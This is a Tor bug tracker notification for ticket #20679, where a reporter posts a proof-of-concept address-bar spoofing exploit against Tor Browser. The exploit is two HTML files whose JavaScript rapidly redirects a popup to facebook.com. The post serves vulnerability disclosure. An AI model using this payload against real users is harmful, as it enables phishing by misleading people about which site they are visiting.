[tor-bugs] #20679 [Applications/Tor Browser]: Tor Bowser Address Spoofing.
Tor Bug Tracker & Wiki
blackhole at torproject.org
Wed Oct 3 16:39:36 UTC 2018
#20679: Tor Bowser Address Spoofing.
--------------------------------------+-----------------------------------
Reporter: Dhiraj_Mishra | Owner: tbb-team
Type: defect | Status: needs_information
Priority: Medium | Milestone:
Component: Applications/Tor Browser | Version:
Severity: Normal | Resolution:
Keywords: tbb-crash | Actual Points:
Parent ID: | Points:
Reviewer: | Sponsor:
--------------------------------------+-----------------------------------
Comment (by Dhiraj):
Sure, open spoof.html
# spoof.html
<script>
function next()
{
w.location.replace('http://www.facebook.com/index.php?'+n);n++;
setTimeout("next();",15);
setTimeout("next();",25);
}
function f()
{
w=window.open("content.html","_blank","width=500 height=500");
i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
}
</script>
<a href="#" onclick="f()">Welcome to Facebook.</a><br>
# content.html
<b>content.html</b>
<script>location="http://www.facebook.com/index.php?";</script>
--
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/20679#comment:6>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online
More information about the tor-bugs
mailing list